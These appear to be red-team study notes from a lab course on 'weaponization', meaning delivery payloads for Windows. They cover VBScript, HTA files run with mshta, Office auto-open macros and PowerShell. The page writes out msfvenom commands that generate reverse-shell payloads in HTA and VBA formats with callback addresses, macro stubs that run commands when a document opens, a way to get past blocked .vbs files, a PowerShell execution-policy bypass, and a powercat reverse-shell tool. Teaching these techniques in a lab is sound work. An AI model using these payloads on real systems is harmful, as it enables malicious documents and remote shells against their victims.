☣️Weaponization

Visual Basic Scripts

cscript.exe = CLI Scripts wscript.exe = UI Scripts executes Microsoft Visual Basic Scripts (VBScript) (vbs, vbe)

Example Script - Message Box: Dim message message = "Hello from the Red Team" MsgBox message

Example Script - Run Calc: Set shell = WScript.CreateObject("Wscript.Shell") shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True

Example - Run Script as .txt if .vbs is blocked: c:\Windows\System32>wscript /e:VBScript c:\Users\thm\Desktop\payload.txt

HTML App (HTA)

mshta executes .hta files

Example - ActiveXObject Payload:

var c= 'cmd.exe' new ActiveXObject('WScript.Shell').Run(c);

Create HTA payload - Reverse Shell: $ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.232.37 LPORT=443 -f hta-psh -o thm.hta

or use msfconsole: exploit/windows/misc/hta_server

Visual Basic App (VBA)

Microsoft Office Macros Word = Document_Open() Excel = Workbook_Open()

Example - Auto-Open Message Box: Sub Document_Open() THM End Sub

Sub AutoOpen() THM End Sub

Sub THM() MsgBox ("Hi from the Red Team") End Sub

Example - Auto-Open Calc: Sub Document_Open() THM End Sub

Sub AutoOpen() THM End Sub

Sub THM() Dim payload As String payload = "calc.exe" CreateObject("Wscript.Shell").Run payload,0 End Sub

Create VBA payload - Reverse Shell: $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.50.159.15 LPORT=443 -f vba

PowerShell (PSH)

Example - Bypass restrictions: powershell -ex bypass -File payload.ps1

PoweShell Reverse Shell: $ git clone https://github.com/besimorhino/powercat.git

PreviousOffice Macros NextLog4Shell